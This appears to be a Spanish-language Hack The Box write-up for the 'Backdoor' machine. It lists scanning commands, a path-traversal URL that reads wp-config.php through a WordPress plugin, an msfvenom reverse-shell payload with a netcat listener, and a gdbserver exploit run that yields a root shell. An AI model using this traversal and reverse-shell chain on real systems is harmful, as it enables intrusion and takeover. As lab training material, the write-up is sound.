Backdoor

Backdoor


HTB Linux

nmap -A -p- -oA backdoor 10.129.188.167 —min-rate=10000 —script=vuln —script-timeout=15 -v

nmap -sC -sV -O -p- -oA backdoor 10.129.188.167

nmap -sU -O -p- -oA backdoor-udp 10.129.188.167

nikto -h 10.129.188.167

dirsearch —url=http://10.129.188.167/ —threads=50 —random-agent -o control.html -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

ssh_command.

ssh_command.

ssh_command.

wpscan —url 10.129.188.167 —enumerate vp,u,vt,tt

ssh_command.

Vemos que el administrador es admin para un Wp 5.8.1

searchsploit WordPress 5.8.1

ssh_command.

whatweb http://10.129.188.167

ssh_command.

Vamos a http://10.129.188.167

ssh_command.

Nos dirigimos a http://10.129.188.167/wp-plugins/

ssh_command.

http://10.129.188.167/wp-plugins/ebook-download

ssh_command.

Leemos el readme.txt

ssh_command.

https://www.exploit-db.com/exploits/39575

Nos dirigimos a http://10.129.188.167/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php

ssh_command.

Trate de meterme al login con admin y las contrasenas pero no se pudo

Usamos burpsuite y vemos que tiene un gdbserver

ssh_command.

Buscamos un exploit de gdbserver y encontramos lo siguiente

https://www.exploit-db.com/exploits/50539

Bajamos ese script y lo llamamos 50539.py

nc -lvnp 4444

msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.65 LPORT=4444 PrependFork=true -o shell.bin

ssh_command.

python3 50539.py 10.129.188.167:1337 shell.bin

ssh_command.

export TERM=xterm screen -x root/root

ssh_command.

© 2025 Cu3rv0x